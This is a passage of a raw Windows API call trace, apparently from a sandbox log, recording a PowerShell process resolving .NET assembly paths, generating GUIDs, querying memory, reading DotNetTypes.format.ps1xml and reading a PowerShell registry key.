lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0068.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0068.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0068.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0068.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0068.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0068.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0068.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.131] VirtualQuery (in: lpAddress=0x12bb20, lpBuffer=0x12c9e0, dwLength=0x30 | out: lpBuffer=0x12c9e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.131] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xf0a61d29, Data2=0x8e09, Data3=0x45e8, Data4=([0]=0x85, [1]=0x4, [2]=0x7, [3]=0x8b, [4]=0x94, [5]=0x5f, [6]=0x80, [7]=0x74))) returned 0x0 [0068.132] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xa952a1ff, Data2=0x3baf, Data3=0x4d3e, Data4=([0]=0xa1, [1]=0xa6, [2]=0x3b, [3]=0xca, [4]=0xb3, [5]=0x9b, [6]=0x60, [7]=0x9a))) returned 0x0 [0068.133] VirtualQuery (in: lpAddress=0x12bcd0, lpBuffer=0x12cb90, dwLength=0x30 | out: lpBuffer=0x12cb90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.134] VirtualQuery (in: lpAddress=0x12bcd0, lpBuffer=0x12cb90, dwLength=0x30 | out: lpBuffer=0x12cb90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.135] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x9cee4bfc, Data2=0x101b, Data3=0x4d4d, Data4=([0]=0xb5, [1]=0x4, [2]=0xcc, [3]=0x95, [4]=0xdc, [5]=0x87, [6]=0x6e, [7]=0x5d))) returned 0x0 [0068.137] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x7c921c87, Data2=0xe71f, Data3=0x4bf3, Data4=([0]=0x84, [1]=0x14, [2]=0xba, [3]=0x87, [4]=0x6, [5]=0x2, [6]=0xa1, [7]=0x93))) returned 0x0 [0068.138] VirtualQuery (in: lpAddress=0x12bf20, lpBuffer=0x12cde0, dwLength=0x30 | out: lpBuffer=0x12cde0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.139] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.139] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.139] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x315b164, Data2=0x8338, Data3=0x42dc, Data4=([0]=0x9a, [1]=0x7d, [2]=0x82, [3]=0x54, [4]=0xec, [5]=0x49, [6]=0x86, [7]=0x9))) returned 0x0 [0068.139] VirtualQuery (in: lpAddress=0x12bf20, lpBuffer=0x12cde0, dwLength=0x30 | out: lpBuffer=0x12cde0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.140] VirtualQuery (in: lpAddress=0x12bd40, lpBuffer=0x12cc00, dwLength=0x30 | out: lpBuffer=0x12cc00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.140] VirtualQuery (in: lpAddress=0x12b590, lpBuffer=0x12c450, dwLength=0x30 | out: lpBuffer=0x12c450*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.141] VirtualQuery (in: lpAddress=0x12b590, lpBuffer=0x12c450, dwLength=0x30 | out: lpBuffer=0x12c450*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.141] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xf1452608, Data2=0x1cfa, Data3=0x4d3a, Data4=([0]=0x99, [1]=0xb8, [2]=0xa2, [3]=0x9b, [4]=0xac, [5]=0x7e, [6]=0x29, [7]=0x1d))) returned 0x0 [0068.141] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xe9977c1f, Data2=0xc996, Data3=0x474a, Data4=([0]=0x8c, [1]=0x16, [2]=0xb6, [3]=0x42, [4]=0x35, [5]=0x57, [6]=0xbb, [7]=0x42))) returned 0x0 [0068.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0068.141] SetErrorMode (uMode=0x1) returned 0x1 [0068.142] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0068.142] GetFileType (hFile=0x314) returned 0x1 [0068.142] SetErrorMode (uMode=0x1) returned 0x1 [0068.142] GetFileType (hFile=0x314) returned 0x1 [0068.142] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.143] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.144] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.144] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.145] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.145] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.145] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.145] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.147] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.147] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.147] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.147] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.148] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.148] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.148] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.148] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.150] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.151] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0xbce, lpOverlapped=0x0) returned 1 [0068.151] ReadFile (in: hFile=0x314, lpBuffer=0x35062e6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x35062e6*, lpNumberOfBytesRead=0x12cff8*=0x0, lpOverlapped=0x0) returned 1 [0068.151] ReadFile (in: hFile=0x314, lpBuffer=0x3506bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3506bb0*, lpNumberOfBytesRead=0x12cff8*=0x0, lpOverlapped=0x0) returned 1 [0068.151] CloseHandle (hObject=0x314) returned 1 [0068.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0068.151] SetErrorMode (uMode=0x1) returned 0x1 [0068.151] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12cfa0 | out: lpFileInformation=0x12cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0068.151] SetErrorMode (uMode=0x1) returned 0x1 [0068.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0068.152] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d088 | out: phkResult=0x12d088*=0x314) returned 0x0 [0068.152] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d00c, lpData=0x0, lpcbData=0x12d008*=0x0 | out: lpType=0x12d00c*=0x1, lpData=0x0, lpcbData=0x12d008*=0x56) returned 0x0 [0068.152] CoTaskMemAlloc (cb=0x5a) returned 0x23eaa0 [0068.152] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfdc, lpData=0x23eaa0, lpcbData=0x12cfd8*=0x56 | out: lpType=0x12cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cfd8*=0x56) returned 0x0 [0068.152] CoTaskMemFree (pv=0x23eaa0) [0068.152] RegCloseKey (hKey=0x314) returned 0x0 [0068.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0068.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0068.157] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xe3c838fa, Data2=0x7e10, Data3=0x4bb4, Data4=([0]=0x82, [1]=0x51, [2]=0x12, [3]=0x4f, [4]=0x76, [5]=0xed, [6]=0xde, [7]=0xc4))) returned 0x0 [0068.157] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xc63ef0d8, Data2=0xb334, Data3=0x42a0, Data4=([0]=0x9f, [1]=0x1c, [2]=0x26, [3]=0x9d, [4]=0x38, [5]=0x1d, [6]=0xb2, [7]=0xaf))) returned 0x0 [0068.157] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x53714cf5, Data2=0x3ed2, Data3=0x405d, Data4=([0]=0xbc, [1]=0x1, [2]=0x1e, [3]=0x48, [4]=0x2a, [5]=0x78, [6]=0x4c, [7]=0xfd))) returned 0x0 [0068.158] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x6a6e3193, Data2=0xac16, Data3=0x4110, Data4=([0]=0xaf, [1]=0x32, [2]=0xa, [3]=0x56, [4]=0xde, [5]=0xfc, [6]=0x8f, [7]=0x6e))) returned 0x0 [0068.158] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xf66f10f6, Data2=0xbc0e, Data3=0x4a3f, Data4=([0]=0x9f, [1]=0x74, [2]=0x65, [3]=0x7, [4]=0x8, [5]=0x45, [6]=0xca, [7]=0xa3))) returned 0x0 [0068.158] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x678001d4, Data2=0x4d8d, Data3=0x4bbe, Data4=([0]=0x80, [1]=0xb1, [2]=0x8a, [3]=0xa4, [4]=0x39, [5]=0x3f, [6]=0xc5, [7]=0x91))) returned 0x0 [0068.159] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.159] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x2864597d, Data2=0xe3b3, Data3=0x4456, Data4=([0]=0xac, [1]=0x22, [2]=0xb0, [3]=0x11, [4]=0xf6, [5]=0x19, [6]=0x7d, [7]=0x72))) returned 0x0 [0068.159] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.160] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.160] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xb129b4a, Data2=0x48c4, Data3=0x4e2c, Data4=([0]=0xa9, [1]=0xe8, [2]=0xe5, [3]=0x86, [4]=0x56, [5]=0x5e, [6]=0x96, [7]=0x2))) returned 0x0 [0068.161] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xd6df1436, Data2=0xcf35, Data3=0x4e45, Data4=([0]=0x9c, [1]=0xca, [2]=0x5a, [3]=0x60, [4]=0xb9, [5]=0x1b, [6]=0x26, [7]=0x15))) returned 0x0 [0068.161] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xf6b100d8, Data2=0xc373, Data3=0x4ef9, Data4=([0]=0x89, [1]=0xaf, [2]=0x26, [3]=0x91, [4]=0x1a, [5]=0x60, [6]=0x53, [7]=0xfe))) returned 0x0 [0068.161] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x32a8276f, Data2=0x4537, Data3=0x4989, Data4=([0]=0xab, [1]=0xa6, [2]=0x3f, [3]=0xd9, [4]=0xff, [5]=0x8, [6]=0xb8, [7]=0xe4))) returned 0x0 [0068.161] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.162] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x2572fcd, Data2=0xb4ce, Data3=0x400e, Data4=([0]=0x93, [1]=0xe, [2]=0xd5, [3]=0xa4, [4]=0x93, [5]=0x38, [6]=0xe, [7]=0x50))) returned 0x0 [0068.162] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.163] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.163] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.164] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.164] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.165] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x609b4f64, Data2=0xadb4, Data3=0x4f29, Data4=([0]=0xaa, [1]=0x91, [2]=0xa7, [3]=0x8a, [4]=0x8d, [5]=0x17, [6]=0xfd, [7]=0x35))) returned 0x0 [0068.165] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x8772cc73, Data2=0x5e39, Data3=0x4afe, Data4=([0]=0xa1, [1]=0xd0, [2]=0x82, [3]=0xb3, [4]=0xed, [5]=0xdc, [6]=0x30, [7]=0x7))) returned 0x0 [0068.165] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x521b8396, Data2=0x9409, Data3=0x4069, Data4=([0]=0x88, [1]=0xb4, [2]=0x2f, [3]=0xc1, [4]=0x62, [5]=0x9b, [6]=0x42, [7]=0x7d))) returned 0x0 [0068.166] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x2e9f95dc, Data2=0x42c5, Data3=0x4bc1, Data4=([0]=0x83, [1]=0xe, [2]=0x96, [3]=0x41, [4]=0xdd, [5]=0x53, [6]=0x7e, [7]=0x81))) returned 0x0 [0068.166] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xefdbce9d, Data2=0xf98d, Data3=0x4d36, Data4=([0]=0x82, [1]=0x7a, [2]=0x85, [3]=0x10, [4]=0x76, [5]=0x7, [6]=0x6b, [7]=0x3a))) returned 0x0 [0068.166] VirtualQuery (in: lpAddress=0x12bf20, lpBuffer=0x12cde0, dwLength=0x30 | out: lpBuffer=0x12cde0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.167] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x9d39fb21, Data2=0xa3b5, Data3=0x40ea, Data4=([0]=0x8d, [1]=0xbf, [2]=0x67, [3]=0x90, [4]=0x5d, 